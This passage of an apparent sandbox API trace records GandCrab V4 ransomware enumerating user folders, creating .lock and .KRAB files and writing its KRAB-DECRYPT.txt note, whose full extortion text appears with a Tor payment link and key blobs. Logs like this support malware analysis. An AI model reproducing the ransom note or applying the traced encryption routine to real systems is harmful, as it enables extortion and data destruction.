nDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.407] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.408] CloseHandle (hObject=0x320) returned 1 [0100.408] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.408] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.408] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x25e)) [0100.408] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.409] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.409] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.409] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.409] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\documents\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.410] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.410] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.410] lstrlenW (lpString="C:\\Users\\Default\\Documents\\") returned 27 [0100.410] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0100.410] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdae0 [0100.410] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.410] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.410] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.410] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.410] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.410] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Documents\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Documents\\d2ca4a08d2ca4dee3d.lock" [0100.410] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.411] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Documents\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 55 [0100.411] lstrlenW (lpString="C:\\Users\\Default\\Documents\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.411] lstrlenW (lpString=".lock") returned 5 [0100.411] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.411] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.411] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.411] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.412] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.412] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.412] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.412] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Documents\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Documents\\KRAB-DECRYPT.txt" [0100.412] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.412] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Documents\\KRAB-DECRYPT.txt.KRAB") returned 48 [0100.412] lstrlenW (lpString="C:\\Users\\Default\\Documents\\KRAB-DECRYPT.txt") returned 43 [0100.412] lstrlenW (lpString=".txt") returned 4 [0100.412] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.412] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.412] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.413] lstrlenW (lpString="C:\\Users\\Default\\Documents\\KRAB-DECRYPT.txt") returned 43 [0100.413] lstrlenW (lpString="C:\\Users\\Default\\Documents\\KRAB-DECRYPT.txt") returned 43 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.413] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.413] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.413] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.413] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0100.413] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0100.413] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0100.413] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0100.413] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.414] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.414] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.414] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.414] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.414] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.414] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.414] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\\\KRAB-DECRYPT.txt") returned 53 [0100.414] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\my music\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0100.417] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.417] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.418] CloseHandle (hObject=0x434) returned 1 [0100.418] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.419] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.419] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x26e)) [0100.419] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.419] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.419] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.419] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\d2ca4a08d2ca4dee3d.lock") returned 59 [0100.419] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\documents\\my music\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0100.421] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.422] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.422] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Music\\") returned 36 [0100.422] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*") returned="C:\\Users\\Default\\Documents\\My Music\\*" [0100.422] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xffffffff [0100.422] CloseHandle (hObject=0x434) returned 1 [0100.422] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.422] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0100.422] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0100.422] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0100.422] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0100.422] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.423] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.423] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.423] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.423] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.423] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.423] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.423] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\\\KRAB-DECRYPT.txt") returned 56 [0100.424] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\my pictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0100.424] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 